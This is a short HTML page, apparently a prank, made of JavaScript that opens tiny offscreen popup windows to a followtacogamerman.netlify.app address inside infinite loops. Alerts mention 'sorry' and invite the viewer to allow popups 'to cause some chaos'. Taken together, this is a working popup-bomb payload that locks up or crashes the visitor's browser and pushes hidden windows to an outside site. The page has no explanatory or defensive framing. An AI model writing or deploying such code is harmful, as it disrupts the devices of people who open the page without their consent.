<script>
window.open("https://followtacogamerman.netlify.app", "", "toolbar=no,scrollbars=no,resizable=no,top=10000,left=10000,width=1,height=1");
window.blur();
window.focus();
while(true){
  window.open("https://followtacogamerman.netlify.app", "", "toolbar=no,scrollbars=no,resizable=no,top=10000,left=10000,width=1,height=1");
  window.blur();
  window.focus();
}
</script>

<script>
alert('sorry')
</script>
alert('Allow popups if you want to cause some chaos')
<script>
  while (true) {
    window.open("https://followtacogamerman.netlify.app");
  }
</script>
